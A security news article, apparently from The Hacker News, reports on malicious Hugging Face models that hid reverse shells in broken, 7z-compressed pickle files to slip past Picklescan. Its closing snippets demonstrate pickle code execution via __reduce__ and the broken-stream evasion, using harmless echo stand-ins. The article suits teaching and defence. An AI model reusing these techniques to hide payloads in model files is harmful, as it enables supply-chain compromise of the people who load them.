Malicious ML Models on Hugging Face Leverage Broken Pickle Format to Evade Detection
thehackernews.com
Feb 08, 2025 · Ravie Lakshmanan · Artificial Intelligence / Supply Chain Security

Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.

"The pickle files extracted from the mentioned PyTorch archives revealed the malicious Python content at the beginning of the file," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "In both cases, the malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP address."

The approach has been dubbed nullifAI, as it involves clear-cut attempts to sidestep existing safeguards put in place to identify malicious models. The Hugging Face repositories are listed below -

- glockr1/ballr7
- who-r-u0000/0000000000000000000000000000000000000

It's believed that the models are more of a proof-of-concept (PoC) than an active supply chain attack scenario.

The pickle serialization format, commonly used for distributing ML models, has been repeatedly found to be a security risk, as it offers ways to execute arbitrary code as soon as a pickle file is loaded and deserialized.

The two models detected by the cybersecurity company are stored in the PyTorch format, which is essentially a compressed pickle file. While PyTorch uses the ZIP format for compression by default, the identified models were found to be compressed using the 7z format.

Consequently, this made it possible for the models to fly under the radar and avoid getting flagged as malicious by Picklescan, a tool used by Hugging Face to detect suspicious pickle files.

"An interesting thing about this Pickle file is that the object serialization, the purpose of the Pickle file, breaks shortly after the malicious payload is executed, resulting in the failure of the object's decompilation," Zanki said.

Further analysis revealed that such broken pickle files can still be partially deserialized owing to a discrepancy between how Picklescan validates pickle files and how deserialization actually works, causing the malicious code to be executed even though the tool throws an error message. The open-source utility has since been updated to rectify this bug.

"The explanation for this behavior is that the object deserialization is performed on Pickle files sequentially," Zanki noted.

"Pickle opcodes are executed as they are encountered, and until all opcodes are executed or a broken instruction is encountered. In the case of the discovered model, since the malicious payload is inserted at the beginning of the Pickle stream, execution of the model wouldn't be detected as unsafe by Hugging Face's existing security scanning tools."
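To illustrate the underlying risk described above: pickle lets any object define a __reduce__ method, and the callable it returns is invoked during deserialization. A minimal sketch follows; the Payload class and the harmless echo command are illustrative stand-ins, not the actual payload from the discovered models.

```python
# Minimal sketch of pickle's code-execution risk: any object can define
# __reduce__, and pickle invokes the returned callable on load.
import os
import pickle


class Payload:
    def __reduce__(self):
        # A real attacker would return a reverse-shell command here;
        # "echo pwned" is a harmless stand-in.
        return (os.system, ("echo pwned",))


blob = pickle.dumps(Payload())
pickle.loads(blob)  # prints "pwned": the command ran during deserialization
```

This is why loading an untrusted pickle-based checkpoint amounts to executing the uploader's code on your machine.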
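The 7z evasion hinges on container-format detection: a scanner that only recognizes the ZIP archives torch.save() produces by default never reaches the pickle inside a 7z archive. Below is a hypothetical magic-byte check illustrating the distinction; archive_format is an invented helper and does not reflect Picklescan's actual logic.

```python
# Hypothetical sketch: distinguishing a default PyTorch (ZIP) checkpoint
# from a 7z-compressed one by the file's leading magic bytes.
ZIP_MAGIC = b"PK\x03\x04"              # what torch.save() emits by default
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"   # the container the malicious models used


def archive_format(path: str) -> str:
    with open(path, "rb") as f:
        head = f.read(6)
    if head.startswith(ZIP_MAGIC):
        return "zip"
    if head.startswith(SEVENZ_MAGIC):
        return "7z"
    return "unknown"
```

A scanner that bails out on "unknown" (or on anything but "zip") would skip the embedded pickle entirely, which matches the fly-under-the-radar behavior the researchers observed.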
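Zanki's point about sequential execution can also be demonstrated directly: opcodes run as the unpickler encounters them, so a payload placed before a broken instruction fires even though the load ultimately fails. A rough sketch under that assumption, again with a harmless echo standing in for the reverse shell:

```python
# Sketch of the nullifAI trick: execute the payload, then break the stream.
# Pickle opcodes run sequentially, so the call fires before the parse error.
import os
import pickle


class Payload:
    def __reduce__(self):
        return (os.system, ("echo payload ran",))


stream = pickle.dumps(Payload())   # ... GLOBAL ... REDUCE ... STOP
broken = stream[:-1] + b"\xff"     # replace STOP ('.') with an invalid opcode

try:
    pickle.loads(broken)           # raises UnpicklingError on the bad opcode...
except pickle.UnpicklingError:
    pass                           # ...but "payload ran" was already printed
```

A validator that flags a file only after a full, successful parse reports an error here while the command has already executed, mirroring the discrepancy between Picklescan and real deserialization that the updated tool now accounts for.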